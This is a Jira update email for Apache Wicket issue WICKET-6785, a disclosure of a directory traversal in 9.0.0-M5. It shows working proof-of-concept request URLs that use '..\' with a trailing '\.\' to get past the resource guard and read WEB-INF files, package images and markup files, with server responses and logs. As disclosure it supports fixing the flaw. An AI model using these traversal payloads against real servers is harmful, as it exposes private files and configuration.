[ https://issues.apache.org/jira/browse/WICKET-6785?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Mariusz Popłwski updated WICKET-6785:
-------------------------------------

Summary: Wicket directory traversal to root package - read file out of scope  (was: Wicket directory traversal to root package - read wicker markup files)

> Wicket directory traversal to root package - read file out of scope
> -------------------------------------------------------------------
>
>                 Key: WICKET-6785
>                 URL: https://issues.apache.org/jira/browse/WICKET-6785
>             Project: Wicket
>          Issue Type: Bug
>          Components: wicket-core
>    Affects Versions: 9.0.0-M5
>         Environment: Default installation of Wicket from
> https://wicket.apache.org/start/quickstart.html
> allows reproducing the vulnerability described below.
>
> mvn archetype:generate -DarchetypeGroupId=org.apache.wicket
> -DarchetypeArtifactId=wicket-archetype-quickstart -DarchetypeVersion=9.0.0-M5
> -DgroupId=com.mycompany -DartifactId=myproject
> -DarchetypeRepository=https://repository.apache.org/ -DinteractiveMode=false
>            Reporter: Mariusz Popłwski
>            Priority: Major
>         Attachments: project_root.png, wicket-poc1.png, wicket-poc2.png, wicket-poc3.png
>
>
> An unauthorized user is allowed to read files out of the allowed scope by combining
> directory traversal with a bypass of the guard protection.
>
> The security risk is medium due to the next protection layer, the guard's default
> file-extension white list; in case of a bypass of this restriction the vulnerability
> may be critical. We are even allowed to ask the server for WEB-INF\web.xml, but the
> guard blocks our attempt.
>
> The user is able to escape the root with the use of directory traversal "..\..\"; the
> key to the vulnerability is the use of the "\.\" current-directory mark at the end of
> the query, which leads to a bypass of the guard protection.
>
> *Proofs of concept.*
>
> Request:
>
> {code:java}
> https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\.\WEB-INF\web.xml
> {code}
>
> Response:
>
> {code:java}
> org.apache.wicket.request.resource.PackageResource$PackageResourceBlockedException:
> Access denied to (static) package resource ././WEB-INF/web.xml. See IPackageResourceGuard
> {code}
>
> Request:
>
> {code:java}
> https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\.\WEB-INF\file_in_web_inf.txt
> {code}
>
> Response:
>
> {code:java}
> HTTP/1.1 200 OK
> Connection: close
> Date: Thu, 14 May 2020 11:37:34 GMT
> Last-Modified: Thu, 14 May 2020 11:36:38 GMT
> Expires: Fri, 14 May 2021 11:37:34 GMT
> Cache-Control: private
> Cache-Control: max-age=31536000
> Pragma: cache
> Content-Disposition: inline
> Content-Type: text/plain
> Accept-Range: bytes
> Content-Length: 4
> Server: Jetty(9.4.27.v20200227)
>
> 1337
> {code}
>
> My app structure:
>
> {code:java}
> src/
>   main/
>     java/
>       com.mycompany/
>         fileupload/
>           FileUploadPanel.class
>         HomePage.class
>         HomePage.html
>         javaroot.png
>         WicketApplication.class
>     resource/
>     webapp/
>       WEB-INF/
>         file_in_web_inf.txt
>         web.xml
>   test/
> {code}
>
>
> *Bypass of the guard's block on reading files from the java/ packages dir.*
> ------------------------
>
> Trying to read the file "javaroot.png" from the java/ folder.
>
> Request:
>
> {code:java}
> https://192.168.1.11:8443/wicket/resource/com.mycompany.HomePage/..\..\javaroot.png
> {code}
>
> *Server log:*
>
> {code:java}
> [qtp1521118594-25] WARN org.apache.wicket.markup.html.PackageResourceGuard - Access to root directory is by default disabled for shared resources: javaroot.png
> [qtp1521118594-25] WARN RequestCycleExtra - ********************************
> [qtp1521118594-25] WARN RequestCycleExtra - Handling the following exception
> org.apache.wicket.request.resource.PackageResource$PackageResourceBlockedException: Access denied to (static) package resource javaroot.png. See IPackageResourceGuard
>   at org.apache.wicket.request.resource.PackageResource.internalGetResourceStream(PackageResource.java:584)
> {code}
>
> User output:
>
> {code:java}
> Last cause: Access denied to (static) package resource javaroot.png. See IPackageResourceGuard<br/>
> {code}
>
> Bypass using \.:
>
> {code:java}
> https://192.168.1.11:8443/wicket/resource/com.mycompany.HomePage/..\..\.\javaroot.png
> {code}
>
> User output (partial):
>
> {code:java}
> HTTP/1.1 200 OK
> Connection: close
> Date: Thu, 14 May 2020 11:09:14 GMT
> Last-Modified: Wed, 13 May 2020 18:11:09 GMT
> Expires: Fri, 14 May 2021 11:09:14 GMT
> Cache-Control: private
> Cache-Control: max-age=31536000
> Pragma: cache
> Content-Disposition: inline
> Content-Type: image/png
> Accept-Range: bytes
> Content-Length: 12244
> Server: Jetty(9.4.27.v20200227)
>
> PNG.....
> {code}
>
>
> *Bypass of the guard's block on reading markup files*
> ------------------------
>
> Directory traversal allows us to get into another package, but we are still
> forbidden to preview Wicket markup files:
>
> {code:java}
> https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\com/mycompany/HomePage.html?
> {code}
>
> Error on the server side:
>
> {code:java}
> [qtp1521118594-30] WARN org.apache.wicket.markup.html.PackageResourceGuard - Access denied to shared (static) resource because it is a Wicket markup file: com/mycompany/HomePage.html
> {code}
>
> User output:
>
> {code:java}
> Last cause: Access denied to (static) package resource com/mycompany/HomePage.html. See IPackageResourceGuard<br/>
> {code}
>
> Bypass:
>
> {code:java}
> https://192.168.1.11:8443/wicket/resource/org.apache.wicket.Application/..\..\..\.\com/mycompany/HomePage.html?
> {code}
>
> User output:
>
> {code:java}
> HTTP/1.1 200 OK
> Connection: close
> Date: Thu, 14 May 2020 11:10:05 GMT
> Last-Modified: Thu, 14 May 2020 10:54:40 GMT
> Expires: Fri, 14 May 2021 11:10:05 GMT
> Cache-Control: private
> Cache-Control: max-age=31536000
> Pragma: cache
> Content-Disposition: inline
> Content-Type: text/html
> Accept-Range: bytes
> Content-Length: 640
> Server: Jetty(9.4.27.v20200227)
>
> <!DOCTYPE html>
> <html xmlns:wicket="http://wicket.apache.org">
> <head>
> <meta charset="utf-8" />
> <title>Apache Wicket Quickstart</title>
> <link href='http://fonts.googleapis.com/css?family=Yanone+Kaffeesatz:regular,bold' rel='stylesheet' type='text/css' />
> <link rel="stylesheet" href="style.css" type="text/css" media="screen" title="Stylesheet" />
> </head>
> <body>
> <div id="hd">
> <div id="logo">
> <img src="logo.png" width="50px" height="50px" alt="Wicket Logo" />
> <h1>Apache Wicket</h1>
> </div>
> </div>
> <div id="bd">
> <div wicket:id="fileUpload"></div>
> </div>
> <div id="ft">
> </div>
> </body>
> </html>
> {code}

--
This message was sent by Atlassian Jira
(v8.3.4#803005)